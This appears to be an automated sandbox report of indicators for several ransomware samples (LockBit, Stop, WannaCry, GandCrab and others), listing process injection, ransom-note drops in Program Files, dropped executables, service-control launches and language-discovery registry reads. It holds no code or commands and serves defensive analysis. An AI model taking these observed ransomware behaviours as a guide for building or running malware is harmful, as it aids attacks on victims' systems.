HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe 3944 HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3328 set thread context of 4480 3328 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 132 PID 1660 set thread context of 5844 1660 HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe 169 PID 2272 set thread context of 2864 2272 Services.exe 174 -
resource yara_rule behavioral1/files/0x000400000001e776-164.dat upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Restore-My-Files.txt HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_COL.HXC HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Trial-pl.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Retail-pl.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\msth8EN.LEX HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\resources.pri HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\StoreLogo.scale-200.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Organic.thmx HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_KMS_Automation-ppd.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root-bridge-test.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ppd.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Grace-ul-oob.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\WideLogo.scale-125_contrast-white.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\be-BY\View3d\3DViewerProductDescription-universal.xml HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\libxslt.md HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_K_COL.HXK HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\161.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square150x150Logo.scale-100.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_OEM_Perp-ppd.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\SplashScreen.scale-400.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSGR8ES.LEX HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-125_kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-125.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Retail-ul-phn.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_MAK-ul-phn.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\24.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-72_altform-unplated_contrast-black.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_EyeLookingUp.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-pl.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_OEM_Perp-pl.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_MAK_AE-ppd.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\OFFSYMSB.TTF HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\libffi.md HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription2-pl.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\resources.pri HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL110.XML HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\resources.pri HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\relaxngom.md HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_KMS_ClientC2R-ul.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubMedTile.scale-125_contrast-black.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-256_altform-unplated_contrast-white.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\gstreamer.md HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\relaxngom.md HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\188.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\SplashScreen.scale-100.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Wide310x150Logo.scale-125.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_TW.properties HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\flat_officeFontsPreview.ttf HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ApothecaryResume.dotx HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Windows Media Player\uk-UA\wmpnssci.dll.mui HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\PhotosWideTile.scale-100.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\StoreLogo.scale-400_contrast-white.png HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\deploy\Restore-My-Files.txt HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ul-oob.xrm-ms HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\nl-NL\View3d\3DViewerProductDescription-universal.xml HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Hedge.dxt HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\zh-CN\Restore-My-Files.txt HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\xk.exe Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File created C:\Windows\xk.exe Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe File created C:\Windows\__tmp_rar_sfx_access_check_240682531 Trojan-Ransom.Win32.Wanna.amap-5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9.exe File created C:\Windows\eee.exe Trojan-Ransom.Win32.Wanna.amap-5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3348 sc.exe 6024 sc.exe 4860 sc.exe 6320 sc.exe 4356 sc.exe 7028 sc.exe 6556 sc.exe 6780 sc.exe 6716 sc.exe 288 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 536 3772 WerFault.exe 111 4936 1840 WerFault.exe 1804 540 WerFault.exe 107 1896 4312 WerFault.exe 110 -
System Location Discovery: System Language Discovery 1 TTPs 56 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.GandCrypt.gen-612278239c759c6f8fa512a6b48887e502f4c989987c574213485b1eb318b545.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Wanna.amap-5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 